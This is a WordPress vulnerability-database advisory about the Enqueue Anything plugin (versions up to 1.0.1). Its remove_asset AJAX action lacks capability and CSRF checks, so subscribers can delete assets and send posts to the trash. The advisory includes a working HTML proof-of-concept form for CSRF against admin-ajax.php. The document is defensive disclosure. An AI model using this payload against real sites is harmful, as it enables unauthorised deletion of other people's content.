WordPress Plugin Vulnerabilities
Enqueue Anything <= 1.0.1 - Subscriber+ Arbitrary Asset/Post Deletion
Description
The plugin does not have authorisation and CSRF checks in the remove_asset AJAX action, and does not ensure that the item to be deleted is actually an asset. As a result, low privilege users such as subscriber could delete arbitrary assets, as well as put arbitrary posts in the trash.
v1.0.1 added a check to ensure post to be removed is an asset. However the plugin is still missing capability and CSRF checks
Proof of Concept
As a subscriber, or via CSRF against any authenticated user <html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="remove_asset" /> <input type="hidden" name="id" value="289" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Affects Plugins
References
CVE
Classification
Type
NO AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
abhishek bhoir
Submitter
abhishek bhoir
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-17 (about 1 years ago)
Added
2022-05-17 (about 1 years ago)
Last Updated
2022-05-18 (about 1 years ago)